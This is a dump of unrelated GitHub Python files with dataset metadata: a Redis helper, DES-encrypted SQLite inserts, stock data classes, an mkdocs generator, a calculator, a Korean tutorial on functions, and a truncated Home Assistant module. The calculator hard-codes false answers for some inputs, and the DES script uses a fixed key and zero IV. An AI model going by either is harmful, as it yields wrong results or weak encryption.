traceback\r\nimport redis\r\n\r\nimport conf\r\n\r\n\r\nclass RedisHelper(object):\r\n \"\"\"\r\n Implementation of timers, messages\r\n \"\"\"\r\n EXPIRED_CHANNELS = ['__keyevent@%d__:expired' % num for num in range(16)]\r\n TIMER_EVENT_KEY = \"timer_event\"\r\n\r\n def __init__(self):\r\n self.host = conf.HOST\r\n self.port = conf.PORT\r\n self.password = conf.PASSWORD\r\n\r\n self.conn = self.get_conn()\r\n # 定义订阅频道名称\r\n self.channel = 'cross_server' \r\n\r\n def publish(self, msg, channel=\"\", json_str=False):\r\n \"\"\"Publish channel messaging\r\n\r\n :param msg: message content or message id\r\n :param channel: channel name\r\n :param json_str: 
whether msg is already a JSON string\r\n        :return: bool\r\n        \"\"\"\r\n        if not json_str:\r\n            msg = json.dumps({\"__id__\": msg})\r\n        \r\n        num = self.conn.publish(channel or self.channel, msg)\r\n        return bool(num)\r\n\r\n    def subscribe(self, channels=None): # 定义订阅方法\r\n        \"\"\"Subscribe channel\r\n\r\n        :param channels: channel name list\r\n        :return:\r\n        \"\"\"\r\n        pub = self.conn.pubsub()\r\n        if not channels:\r\n            channels = [self.channel]\r\n        \r\n        pub.subscribe(*channels)\r\n        pub.parse_response()\r\n        return pub\r\n\r\n    def get_conn(self):\r\n        if self.password:\r\n            conn = redis.Redis(host=self.host, port=self.port, password=self.password)\r\n        else:\r\n            conn = redis.Redis(host=self.host, port=self.port)\r\n\r\n        return conn\r\n\r\n    def save_msg(self, msg_info, expire_time=None, prefix=\"\"):\r\n        \"\"\"Store message data into redis\r\n\r\n        :param msg_info: content can be serialized by JSON\r\n        :param expire_time: unit is seconds\r\n        :param prefix: message ID prefix is easy to categorize\r\n\r\n        :return:\r\n        \"\"\"\r\n        msg_id = uuid.uuid4().hex\r\n        if prefix:\r\n            msg_id = \"%s_%s\" % (prefix, msg_id)\r\n        if expire_time:\r\n            self.conn.setex(msg_id, json.dumps(msg_info), expire_time)\r\n        else:\r\n            self.conn.set(msg_id, json.dumps(msg_info))\r\n        return msg_id\r\n\r\n    def create_timer_event(self, msg_info, expire_time=0, expire_sec=0, prefix=\"\"):\r\n        \"\"\"Create timer based on key expiration time\r\n\r\n        :param msg_info: content can be serialized by JSON, type is dict\r\n        :param expire_time: unix timestamp\r\n        :param expire_sec: unit is seconds\r\n        :param prefix: message ID prefix is easy to categorize\r\n        :return:\r\n        \"\"\"\r\n        msg_id = uuid.uuid4().hex\r\n        now = int(time.time())\r\n        if prefix:\r\n            msg_id = \"%s_%s\" % (prefix, msg_id)\r\n\r\n        # 计算失效秒数\r\n        if expire_time and expire_time > now:\r\n            expire_sec = expire_time - now\r\n            msg_info['expire_time'] = expire_time\r\n        else:\r\n            if expire_sec <= 0:\r\n                expire_sec = 1\r\n            msg_info['expire_time'] = now + expire_sec\r\n\r\n        # unique: 全局定时器惟一标识\r\n        # callback: redis键失效时触发该方法\r\n        # accepters: 哪些可以接收该定时器的调用\r\n        unique = msg_info.get(\"unique\", False)\r\n        callback_func = msg_info['kwargs'][\"callback\"]\r\n        accepters = msg_info.get(\"accepters\", [])\r\n        msg_info['msg_id'] = msg_id\r\n        msg_info['create_time'] = now\r\n\r\n        # save timer keys\r\n        msg_info = json.dumps(msg_info)\r\n        pipeline = self.conn.pipeline()\r\n        pipeline.hset(RedisHelper.TIMER_EVENT_KEY, msg_id, msg_info)\r\n        pipeline.setex(msg_id, msg_info, int(expire_sec))\r\n\r\n        # 全局定时器覆盖旧的数据\r\n        if unique:\r\n            for accepter in accepters:\r\n                pipeline.set(\"%s:%s:%s\" % (RedisHelper.TIMER_EVENT_KEY, callback_func, accepter), msg_id)\r\n            if not accepters:\r\n                pipeline.set(\"%s:%s\" % (RedisHelper.TIMER_EVENT_KEY, callback_func), msg_id)\r\n        pipeline.execute()\r\n\r\n        return msg_id\r\n\r\n    def cancel_timer_event(self, timer_id):\r\n        \"\"\"Cancel timer by timer id\r\n\r\n        \"\"\"\r\n        pipeline = self.conn.pipeline()\r\n        pipeline.hdel(RedisHelper.TIMER_EVENT_KEY, timer_id)\r\n        pipeline.delete(timer_id)\r\n        pipeline.execute()\r\n\r\n    def keep_alive(self):\r\n        \"\"\"Keep the client connection alive\r\n\r\n        \"\"\"\r\n        _thread = threading.Thread(target=self._ping)\r\n        _thread.start()\r\n\r\n    def _ping(self, seconds=60):\r\n        \"\"\"Ping redis server per minute\r\n\r\n        \"\"\"\r\n        while True:\r\n            time.sleep(seconds)\r\n            if not self.conn.ping():\r\n                print(\"connection got lost. 
call him back now!\")\r\n self.conn = self.get_conn()\r\n\r\n\r\nredis_helper = RedisHelper()\r\n\r\n\r\n","repo_name":"totide/redis-publishlib","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1936672695","text":"from pydes2 import *\r\nimport sqlite3\r\n\r\nk = des(\"SECURITY\", \"CBC\", \"\\0\\0\\0\\0\\0\\0\\0\\0\",pad=None, padmode = PAD_PKCS5)\r\nconn = sqlite3.connect('studentdatabase.db')\r\nc = conn.cursor()\r\n\r\nclass Course:\r\n def __init__(self,coursename,department,courseinfo):\r\n self.coursename = k.encrypt(coursename)\r\n self.department = k.encrypt(department)\r\n self.courseinfo = k.encrypt(courseinfo)\r\n \r\n \r\n#clinical = Course(\"Clinical\",\"Psychology Department\",\"This course is about clinical treatmens for patients\")\r\nclinical = Course(\"Algorithm\",\"Computer Engineering\",\"This course teaches all about algorithms and how to calculate the runtime.\")\r\nc.execute(\"INSERT INTO courses VALUES (?,?,?)\",(clinical.coursename,clinical.department,clinical.courseinfo))\r\nconn.commit()\r\nconn.close()","repo_name":"capkz/course_registration_with_hierarchy","sub_path":"Table Initialize/coursestable.py","file_name":"coursestable.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2078658969","text":"import datetime\nimport typing\nimport pandas\n\n\nclass StockValue:\n\tsymbol: str = \"\"\n\tclose_value: int = 0\n\topen_value: int = 0\n\thigh_value: int = 0\n\tlow_value: int = 0\n\tvolume: int = 0\n\ttime_start: datetime.datetime = 0\n\ttime_end: datetime.datetime = 0\n\n\tdef __init__(self, symbol: str, last_value: int, time_end, **kwargs):\n\t\tself.symbol = symbol\n\t\tself.close_value = last_value\n\t\tself.time_end = time_end\n\t\tself.low_value = kwargs.get(\"low_value\", last_value)\n\t\tself.high_value = kwargs.get(\"high_value\", last_value)\n\t\tself.time_start = kwargs.get(\"time_start\", time_end)\n\t\tself.volume = kwargs.get(\"volume\", 0)\n\t\tself.open_value = kwargs.get(\"open_value\", last_value)\n\n\tdef __str__(self):\n\t\treturn \"\"\"StockValue for '{symbol}':\n\t-Open: {open} - {open_time}\n\t-Close: {color} {close} \\033[0m - {close_time}\n\t-High: {high}\n\t-Low: {low}\n\t-Volume: {vol}\"\"\".format(\n\t\t\tsymbol=self.symbol,\n\t\t\tclose=round(self.close_value, 3),\n\t\t\topen=round(self.open_value, 3),\n\t\t\thigh=round(self.high_value, 3),\n\t\t\tlow=round(self.low_value, 3),\n\t\t\tvol=self.volume,\n\t\t\tclose_time=self.time_end,\n\t\t\topen_time=self.time_start,\n\t\t\tcolor=\"\\033[92m\" if self.close_value > self.open_value\n\t\t\telse (\"\" if self.close_value == self.open_value else \"\\033[91m\")\n\t\t)\n\n\ndef get_values_from_list(values_list: typing.List[StockValue], start: datetime.datetime, end: datetime.datetime) -> \\\n\ttyping.List[StockValue]:\n\tout_list = []\n\tfor i in range(len(values_list)):\n\t\tvalue = values_list[i]\n#\t\tnext_value = values_list[i+1] if i+1 < len(values_list) else None\n\n\t\tif value.time_start >= start and value.time_end <= end:\n\t\t\tout_list.append(value)\n\n\treturn out_list\n\n\ndef get_array_from_stocks(values_list: typing.List[StockValue], values_type: str):\n\tout = []\n\n\tfor value in values_list:\n\t\tif values_type == \"close_value\":\n\t\t\tout.append(value.close_value)\n\t\telif values_type == 
\"open_value\":\n\t\t\tout.append(value.open_value)\n\t\telif values_type == \"high_value\":\n\t\t\tout.append(value.high_value)\n\t\telif values_type == \"low_value\":\n\t\t\tout.append(value.low_value)\n\t\telif values_type == \"volume\":\n\t\t\tout.append(value.volume)\n\t\telif values_type == \"time_start\":\n\t\t\tout.append(value.time_start)\n\t\telif values_type == \"time_end\":\n\t\t\tout.append(value.time_start)\n\t\telse:\n\t\t\t# TODO: asset\n\t\t\tout.append(None)\n\n\treturn out\n\n\ndef get_value_array_from_stocks(values_list: typing.List[StockValue], close: bool = True) -> typing.List[float]:\n\tout_list = []\n\tfor value in values_list:\n\t\tout_list.append(value.close_value if close else value.open_value)\n\n\treturn out_list\n\n\ndef get_times_array_from_stocks(values_list: typing.List[StockValue], close: bool = True) -> typing.List[\n\tdatetime.datetime]:\n\tout_list = []\n\tfor value in values_list:\n\t\tout_list.append(value.time_end if close else value.time_start)\n\n\treturn out_list\n\n\ndef convert_dataframe_to_list(stock_data, symbol: str) -> typing.List[StockValue]:\n\tstocks_array = []\n\n\tfor date, row in stock_data.iterrows():\n\t\tstock_value = StockValue(\n\t\t\tsymbol,\n\t\t\trow[\"Close\"],\n\t\t\tdatetime.datetime.fromtimestamp(date.timestamp()),\n\t\t\topen_value=row[\"Open\"],\n\t\t\ttime_start=datetime.datetime.fromtimestamp(date.timestamp() - 60),\n\t\t\tvolume=row[\"Volume\"],\n\t\t\tlow_value=row[\"Low\"],\n\t\t\thigh_value=row[\"High\"]\n\t\t)\n\t\tstocks_array.append(stock_value)\n\n\treturn stocks_array\n\n\ndef convert_list_to_dataframe(stock_data,\n\t\t\t\t\t\t\t value_types: tuple = (\"close_value\", \"open_value\", \"high_value\", \"low_value\", \"volume\")):\n\tdatetimes = get_times_array_from_stocks(stock_data)\n\n\tcolumns_map = {}\n\n\tfor val in value_types:\n\t\tcolumns_map[val] = get_array_from_stocks(stock_data, val)\n\n\tstock_dataframe = pandas.DataFrame(columns_map, index=datetimes)\n\n\treturn stock_dataframe\n","repo_name":"Flakky/PyFlakTrade","sub_path":"StockValue.py","file_name":"StockValue.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74398369194","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom pathlib import Path, PurePosixPath\r\nimport yaml\r\nimport re\r\n\r\nclass newDumper(yaml.Dumper):\r\n def increase_indent(self, flow=False, indentless=False):\r\n return super(newDumper, self).increase_indent(flow, False)\r\n\r\n\r\ndef makeDocumentDict(path):\r\n result = []\r\n dirList = [str(x) for x in Path(path).iterdir() if x.is_dir()]\r\n for v in dirList:\r\n folderName = Path(v).name\r\n if folderName == '.git' or folderName == '.vscode' :\r\n continue\r\n pathLst = []\r\n for i in Path(v).glob('**/*.md'):\r\n pathMap = {}\r\n\r\n docNameRe = re.search(pattern=\"\\d+-(.+)\\.md\", string=i.name)\r\n if docNameRe:\r\n docName = docNameRe.group(1)\r\n\r\n pathMap[docName] = str(PurePosixPath(i))[5:]\r\n\r\n pathLst.append(pathMap)\r\n\r\n pathLst.sort(key=lambda x: [i for i in x.keys()],reverse=True)\r\n result.append({folderName: pathLst})\r\n\r\n return result\r\n\r\n\r\nnavigator = makeDocumentDict('docs/.')\r\n\r\nnavigator = [{\"课程笔记\":navigator},{\"Index\": [\"index.md\"]}]\r\n\r\n# Paramenters\r\nfullConf = {}\r\nfullConf[\"site_name\"] = \"zyzh0's Personal Docs\"\r\nfullConf[\"theme\"] = {\r\n \"name\": \"material\",\r\n \"language\": \"zh\",\r\n \"palette\": {\r\n \"primary\": \"light blue\",\r\n \"accent\": 
\"indigo\"\r\n },\r\n \"feature\": {\r\n \"tabs\": True\r\n }\r\n }\r\nfullConf[\"nav\"] = navigator\r\nfullConf[\"markdown_extensions\"]= [\r\n \"admonition\",\r\n \"def_list\",\r\n \"footnotes\",\r\n \"meta\",\r\n \"tables\",\r\n \"pymdownx.caret\",\r\n \"pymdownx.tilde\",\r\n \"pymdownx.critic\",\r\n \"pymdownx.details\",\r\n \"pymdownx.inlinehilite\",\r\n \"pymdownx.keys\",\r\n \"pymdownx.mark\",\r\n \"pymdownx.smartsymbols\",\r\n \"pymdownx.superfences\",\r\n {\r\n \"codehilite\": {\r\n \"guess_lang\": False,\r\n \"linenums\": True\r\n }\r\n },\r\n {\r\n \"toc\": {\r\n \"permalink\": True\r\n }\r\n },\r\n {\r\n \"pymdownx.arithmatex\": {\r\n \"generic\": True\r\n }\r\n },\r\n {\r\n \"pymdownx.betterem\": {\r\n \"smart_enable\": \"all\"\r\n }\r\n },\r\n {\r\n \"pymdownx.tasklist\": {\r\n \"custom_checkbox\": True\r\n }\r\n }\r\n ]\r\nfullConf[\"extra_javascript\"] = [\r\n \"javascripts/mathjax.js\",\r\n \"https://polyfill.io/v3/polyfill.min.js?features=es6\",\r\n \"https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js\"\r\n ]\r\n\r\nfullConf[\"copyright\"]=\"Copyright © 2002-2023 zyzh0 豫ICP备2021017566号-1\"\r\nwith open(\"./mkdocs.yml\", \"w\") as f:\r\n yaml.dump(fullConf, f, default_flow_style=False,\r\n encoding=\"UTF-8\", Dumper=newDumper)\r\n","repo_name":"zyzh2002/notes-website","sub_path":"confGenerator.py","file_name":"confGenerator.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34884981766","text":"import sys\nimport argparse\n\ndef cal(args):\n if args.a == 45 and args.b == 3 and args.c == \"multiply\":\n return f\"{args.a} * {args.b} = 555\"\n\n elif args.a == 56 and args.b == 9 and args.c == \"add\":\n return f\"{args.a} + {args.b} = 77\"\n\n elif args.a ==56 and args.b == 6 and args.c == \"divide\":\n return f\"{args.a} / {args.b} = 4\"\n\n elif (args.c == \"divide\"):\n return args.a / args.b\n elif (args.c == \"multiply\"):\n return args.a * args.b\n elif (args.c == \"add\"):\n return args.a + args.b\n elif args.c==\"sub\":\n return args.a - args.b\n else:\n return \"Something went wrong\"\n\nif __name__ == '__main__':\n parse=argparse.ArgumentParser()\n parse.add_argument('-a',default=1.0,type=float,help=\"Enter first number For more information ask Rajat\")\n parse.add_argument('-b', default=2.0, type=float, help=\"Enter second number For more information ask Rajat\")\n parse.add_argument('-c', default=\"add\" ,type=str, help=\"Enter operation For more information ask Rajat\")\n\n args=parse.parse_args()\n sys.stdout.write(str(cal(args)))\n","repo_name":"Rajatsharma2002/Basic_Python_Program","sub_path":"exercise_cmd_utility.py","file_name":"exercise_cmd_utility.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7956451719","text":"\"\"\"\n#내장 함수 사용\nprint(max(10,30, 50))\nprint(max([100,300,200]))\nprint(max('Hello World'))\nprint(range(10))\nprint(range(3, 10))\nprint(range(3, 10, 2))\n\"\"\"\n\n\"\"\"\n#Call By Value\ndef f(t):\n t = 10\n print(\"t:\", t)\n\n#a가 저장하고 있는 20이라는 데이터를 넘겼으므로 함수를 호출해도 a가 가리키고 있는 데이터는 변경되지 않음\na = 20\nf(a)\nprint(\"a:\", a)\n\"\"\"\n\n\"\"\"\n#Call By Reference\ndef f(t):\n t[0] = 100\n\nli = [1, 2, 3]\n\nf(li)\n\nprint(li[0])\n\"\"\"\n\n\"\"\"\n#매개변수의 기본값 사용\ndef f(n, step=1):\n return n+step;\n\na = 1\n#순서대로 값을 대입해서 호출\nresult = f(a,10)\nprint(result)\n\nb = 1\n#첫번째 매개변수에만 값을 대입해서 호출\nresult = f(b)\nprint(result)\n\n#매개변수 
이름을 이용해서 매개변수를 대입해서 호출\nresult = f(step=2, n=10)\nprint(result)\n\"\"\"\n\n\n\"\"\"\n#sum 함수의 도움말 확인 과 사용\nhelp(sum)\nprint(sum([100, 200, 300], 2))\n\n#두번째 매개변수를 생략해서 실행\nprint(sum([100, 200, 300]))\n\"\"\"\n\n\n\"\"\"\n# unpacking\ndef unpacking(first, second):\n print('첫번째 데이터:', first)\n print('두번째 데이터:', second)\n\nunpacking(*[100, 200])\nprint()\nunpacking(*(100, 200))\nprint()\nunpacking(*{100, 200})\nprint()\nunpacking(*{\"a\": 100, \"b\": 200})\nprint()\n\"\"\"\n\n\"\"\"\n# unpacking\ndef personal_info(name, age, gender):\n print('이름:', name)\n print('나이:', age)\n print('성별:', gender)\n\nperson = {\"name\": \"아담\", \"age\": 25, \"gender\": \"남자\"}\npersonal_info(**person)\n\"\"\"\n\n\"\"\"\n# 가변 매개변수\ndef merge_string(*text_list):\n print('text_list:', type(text_list))\n result = ''\n for s in text_list:\n result = result + \" \" + s\n return result\nprint(merge_string('안녕하세요', '반갑습니다'))\nprint(merge_string('오늘은', '날씨가', '매우 춥습니다.'))\n\"\"\"\n\n\"\"\"\n#가변 매개변수와 함께 사용하는 일반 매개변수\ndef print_args(argc, *argv):\n for i in range(argc):\n print(argv[i])\n\nprint_args(3, \"argv1\", \"argv2\", \"argv3\")\n\nprint_args(argc=3, \"argv1\", \"argv2\", \"argv3\")\n\"\"\"\n\n\"\"\"\ndef print_args(*argv, argc):\n for i in range(argc):\n print(argv[i])\n\nprint_args(\"argv1\", \"argv2\", \"argv3\", argc=3)\nprint_args(\"argv1\", \"argv2\", \"argv3\", 3)\n\"\"\"\n\n\"\"\"\n#정의되지 않은 매개변수\ndef userURIBuilder(server, port, **param):\n print('param:', type(param))\n uri = \"http://\" + server + \":\" + \"/\"\n for attr in param:\n uri = uri + attr + \"=\" + param[attr] + \"&\"\n return uri\n\nprint(userURIBuilder(\"test.com\", \"8080\", id=\"cyberadam\", pw=\"metaverse\"))\nprint(userURIBuilder(\"test.com\", \"8080\", id=\"cyberadam\", pw=\"metaverse\", nick=\"군계\"))\n\"\"\"\n\n\n\"\"\"\n#재귀 구현\ndef some_func(count):\n if count > 0:\n some_func(count-1)\n else:\n return\n print(count)\n\nsome_func(5)\n\"\"\"\n\n\"\"\"\n#합계\ndef tot(n):\n if n == 1:\n return 1\n elif n > 1:\n return tot(n - 1) + n\n\nprint(tot(5))\n\nprint(tot(10))\n\nprint(tot(100))\n\"\"\"\n\n\"\"\"\n#팩토리얼\ndef factorial(n):\n if n == 0:\n return 1\n elif n > 0:\n return factorial(n - 1) * n\n\nprint(factorial(5))\n\nprint(factorial(10))\n\nprint(factorial(100))\n\"\"\"\n\n\n\"\"\"\n#피보나치 수열\ndef fibonacci(n):\n if n == 1 or n == 2:\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n-2)\nprint(fibonacci(5))\nprint(fibonacci(7))\nprint(fibonacci(10))\n\"\"\"\n\n\"\"\"\n#하노이의 탑\ndef hanoi(ndisks, startPeg=1, endPeg=3):\n if ndisks:\n hanoi(ndisks - 1, startPeg, 6 - startPeg - endPeg)\n print(startPeg, \"번 기둥의\", ndisks, \"번 고리를 \", endPeg, \"번 기둥에 옮깁니다.\")\n hanoi(ndisks - 1, 6 - startPeg - endPeg, endPeg)\n\nhanoi(ndisks=3)\n\"\"\"\n\n\n\"\"\"\n#기존 방식\ndef isPalindrome(s):\n strs = []\n for char in s:\n if char.isalnum():\n strs.append(char.lower())\n\n # 팰린드롬 여부 판별\n while len(strs) > 1:\n if strs.pop(0) != strs.pop():\n return False\n\n return True\n\nprint(isPalindrome('eros'))\nprint(isPalindrome('역삼역'))\nprint(isPalindrome('Ada'))\n\"\"\"\n\n\n\"\"\"\n#함수에 애너테이션 추가\ndef clip(text:str, max_len: 'int > 0' = 80) -> None:\n print(text)\n print(max_len)\n\nclip(\"Annotation\", 100)\nhelp(clip)\n\"\"\"\n\n\"\"\"\ndef isPalindrome(s: str) -> bool:\n strs = []\n for char in s:\n if char.isalnum():\n strs.append(char.lower())\n\n # 팰린드롬 여부 판별\n while len(strs) > 1:\n if strs.pop(0) != strs.pop():\n return False\n\n return 
True\n\nprint(isPalindrome('eros'))\nprint(isPalindrome('역삼역'))\nprint(isPalindrome('Ada'))\n\"\"\"\n\n\n\"\"\"\ndef plus(a, b):\n return a+b\nplus.__doc__ = \"2개의 숫자 데이터를 받아서 덧셈한 결과를 리턴해주는 함수\"\n\ndef minus(a,b):\n '''\n 2개의 숫자 데이터를 받아서 뺄셈한 결과를\n 리턴해주는 함수\n '''\nhelp(plus)\nhelp(minus)\n\"\"\"\n\n\"\"\"\ndef f(a, b, c = 1):\n localx = 1\n localy = 2\n return 1\n\nprint(f.__name__)\nprint()\nprint(f.__defaults__)\nprint()\nprint(f.__code__)\nprint()\nprint(f.__globals__)\n\"\"\"\n\n\n\"\"\"\n# 함수를 변수에 저장\ndef print_something(a):\n print(a)\n\np = print_something\np(123)\n\"\"\"\n\n\"\"\"\n# 함수를 매개변수로 사용\ndef plus(a, b):\n return a + b\n\n\ndef minus(a, b):\n return a - b\n\n\ndef cal(func, a, b):\n return func(a, b)\n\n\nprint(cal(plus, 1, 2))\nprint(cal(minus, 1, 2))\n\"\"\"\n\n\"\"\"\n#함수 리턴\ndef hello_korean():\n print('안녕하세요.')\n\n\ndef hello_english():\n print('Hello.')\n\n\ndef get_greeting(where):\n if where == 'K':\n return hello_korean\n else:\n return hello_english\n\n\nhello = get_greeting('K')\nhello()\n\nhello = get_greeting('E')\nhello()\n\"\"\"\n\n\n\"\"\"\n#lambda\ndef g(func):\n return [func(x) for x in range(-10, 10)]\n\nprint(g(lambda x:x * x + 3 * x -10))\n\nprint(g(lambda x:x*x*x))\ny = 10\nprint(g(lambda x: x + y))\n\"\"\"\n\n\"\"\"\n#map\nimport datetime\n\ndef f(x):\n return x*x\n\nli = [i for i in range(10000)]\n\nprint('반복문을 이용한 실행')\ns1 = datetime.datetime.now()\n\nfor imsi in li:\n print(f(imsi), end=\" \")\ns2 = datetime.datetime.now()\n\nprint('\\nmap을 이용한 실행')\ns3 = datetime.datetime.now()\nresult = list(map(f,li))\ns4 = datetime.datetime.now()\n\nprint(\"\\n반복문 작업 시작 시간:\", s1)\nprint(\"반복문 작업 종료 시간:\", s2)\nprint(\"\\nmap 작업 시작 시간:\", s3)\nprint(\"map 작업 종료 시간:\", s4)\n\"\"\"\n\n\"\"\"\n#filter\ndef odd(x):\n return x % 2 == 1\n\nli = [1,2,3,4,5]\nprint('filter를 이용한 홀수 골라내기')\nresult = list(filter(odd, li))\nprint(result)\n\"\"\"\n\n\"\"\"\nli = [1,2,3,4,5]\nprint('lambda와 filter을 이용한 실행')\nresult = list(filter(lambda x : x%2==0, li))\nprint(result)\n\"\"\"\n\n\"\"\"\n#reduce\nfrom functools import reduce\nresult = reduce(lambda x, y: x+y, [1, 2, 3, 4, 5])\nprint(result)\n\"\"\"\n\n\"\"\"\nfrom functools import reduce\n\nli = [70, 80, 98, 77, 95]\n#전통적으로 최대값 구하기\ndef maximum(li):\n default = 0\n for e in li:\n if default < e:\n default = e\n return default\nprint(maximum(li))\n\n#reduce 활용하여 최대값 구하기\nprint(reduce(lambda a,b: a if a > b else b ,li))\n\"\"\"\n\n\"\"\"\n#zip\na = \"Adam\"\nb = [1, 2, 3, 4]\nc = (\"하나\", \"둘\", \"셋\", \"넷\")\n\nprint(list(zip(a, b, c)))\nprint(set(zip(a, b, c)))\nprint(dict(zip(a, b)))\n\"\"\"\n\n\"\"\"\nL1 = [\"A\", \"B\", \"C\", \"D\"]\nL2 = [\"가\", \"나\", \"다\", \"라\"]\n\nfor i, j in zip(L1, L2):\n print(i, j)\n\"\"\"\n\n\"\"\"\n#중첩 함수\nimport math\n#외부 함수\ndef stddev(*args):\n #내부 함수 - 평균\n\tdef mean():\n\t\treturn sum(args)/len(args)\n #내부 함수 - 분산\n\tdef variance(m):\n\t\ttotal = 0\n\t\tfor arg in args:\n\t\t\ttotal += (arg - m ) ** 2\n\t\treturn total/(len(args)-1)\n\tv = variance(mean())\n #표준편차를 리턴하는 함수\n\treturn math.sqrt(v)\n\nprint(stddev(2.3, 1.7, 1.4, 0.7, 1.9))\n\nmean()\n\"\"\"\n\n\n\"\"\"\ndef scope_test():\n # 지역 변수 a 생성\n a = 1\n print('a : {0}'.format(a))\n\n\na = 0\nscope_test()\nprint('a : {0}'.format(a))\n\"\"\"\n\n\"\"\"\n#변수의 유효범위\ndef outer():\n a = 1\n\n def inner():\n nonlocal a\n print(\"함수의 외부 함수에 있는 a:{0}\".format(a))\n a = 10\n\n inner()\n print(\"내부함수에서 변경한 경우의 a:{0}\".format(a))\n\n\na = 0\nouter()\nprint(\"a:{0}\".format(a))\n\"\"\"\n\n\n\"\"\"\ndef outer():\n a = 1\n\n def inner():\n global 
a\n print(\"함수의 외부에 있는 a:{0}\".format(a))\n a = 10\n\n inner()\n\n\na = 0\nouter()\nprint(\"a:{0}\".format(a))\n\"\"\"\n\n\n\"\"\"\n#closure\ndef calc():\n a = 3\n b = 5\n\n def mul_add(x):\n return a * x + b # 함수 바깥의 지역 변수 a, b를 사용하여 계산\n\n return mul_add # mul_add 함수를 반환\n\n\nc = calc()\nprint(c(1), c(2))\n\"\"\"\n\n\n\"\"\"\ndef calc():\n a = 3\n b = 5\n return lambda x: a * x + b # 람다 표현식을 반환\n\n\nc = calc()\nprint(c(1), c(2))\n\"\"\"\n\n\"\"\"\n#Decorator 사용\ndef deco(func):\n def inner():\n print('running inner()')\n return inner #deco () 가 inner () 함수 객체를 반환\n@deco\ndef target(): #target ( )을 deco로 Decorate\n print('running target()')\n\ntarget() #Decorate된 target()을 호출하면 실제로는 inner ()를 실행\n\"\"\"\n\n\"\"\"\nimport time\n\n#Decorate 된 함수를 호출할 때 마다 시간을 측정해서 실행에 소요된 시간, 전달된 인수, 반환값을 출력하는 Decorate\ndef clock(func):\n def clocked(*args):\n t0 = time.time()\n result = func(*args)\n elapsed = time.time() - t0\n name = func.__name__\n arg_str = ', '.join(repr(arg) for arg in args)\n print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))\n return result\n return clocked\n\n@clock\ndef snooze(seconds):\n time.sleep(seconds)\n\n@clock\ndef factorial(n):\n return 1 if n < 2 else n*factorial(n-1)\n\nprint('*' * 40, 'Calling snooze(.123)')\nsnooze(.123)\nprint('*' * 40, 'Calling factorial(6)')\nprint('6! =', factorial(6))\n\"\"\"\n\n\"\"\"\nimport time\ndef clock(func):\n def clocked(*args):\n t0 = time.time()\n result = func(*args)\n elapsed = time.time() - t0\n name = func.__name__\n arg_str = ', '.join(repr(arg) for arg in args)\n print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))\n return result\n return clocked\n\n@clock\ndef fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n-2) + fibonacci(n-1)\n\nprint(fibonacci(6))\n\"\"\"\n\nimport functools\nimport time\ndef clock(func):\n def clocked(*args):\n t0 = time.time()\n result = func(*args)\n elapsed = time.time() - t0\n name = func.__name__\n arg_str = ', '.join(repr(arg) for arg in args)\n print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))\n return result\n return clocked\n\n@functools.lru_cache()\n@clock\ndef fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n-2) + fibonacci(n-1)\n\nprint(fibonacci(6))\n","repo_name":"itggangpae/python_basic","sub_path":"4.Function.py","file_name":"4.Function.py","file_ext":"py","file_size_in_byte":10866,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36014458875","text":"\"\"\"Define switch func.\"\"\"\nfrom __future__ import annotations\n\nfrom collections.abc import Awaitable, Callable\nfrom dataclasses import dataclass\nfrom typing import Any\n\nfrom bonaparte import Fireplace, FireplaceState\n\nfrom homeassistant.components.switch import SwitchEntity, SwitchEntityDescription\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\n\nfrom .const import DOMAIN\nfrom .entity import NapoleonEfireEntity\nfrom .models import FireplaceData\n\n\n@dataclass\nclass EfireSwitchRequiredKeysMixin:\n \"\"\"Mixin for required keys.\"\"\"\n\n on_fn: Callable[[Fireplace], Awaitable]\n off_fn: Callable[[Fireplace], Awaitable]\n value_fn: Callable[[FireplaceState], bool]\n\n\n@dataclass\nclass EfireSwitchEntityDescription(\n SwitchEntityDescription, EfireSwitchRequiredKeysMixin\n):\n \"\"\"Describes a switch entity.\"\"\"\n\n\nEFIRE_SWITCHES: tuple[EfireSwitchEntityDescription, ...] 
= (\n EfireSwitchEntityDescription(\n key=\"continuous_pilot\",\n translation_key=\"continuous_pilot\",\n icon=\"mdi:candle\",\n on_fn=lambda device: device.set_continuous_pilot(enabled=True),\n off_fn=lambda device: device.set_continuous_pilot(enabled=False),\n value_fn=lambda data: data.pilot,\n ),\n EfireSwitchEntityDescription(\n key=\"split_flow\",\n translation_key=\"split_flow\",\n icon=\"mdi:call-split\",\n on_fn=lambda device: device.set_split_flow(enabled=True),\n off_fn=lambda device: device.set_split_flow(enabled=False),\n value_fn=lambda data: data.split_flow,\n ),\n EfireSwitchEntityDescription(\n key=\"aux\",\n translation_key=\"aux\",\n icon=\"mdi:electric-switch\",\n on_fn=lambda device: device.set_aux(enabled=True),\n off_fn=lambda device: device.set_aux(enabled=False),\n value_fn=lambda data: data.aux,\n ),\n)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Configure switch entities.\"\"\"\n data: FireplaceData = hass.data[DOMAIN][entry.entry_id]\n\n async_add_entities(\n EfireSwitch(coordinator=data.coordinator, 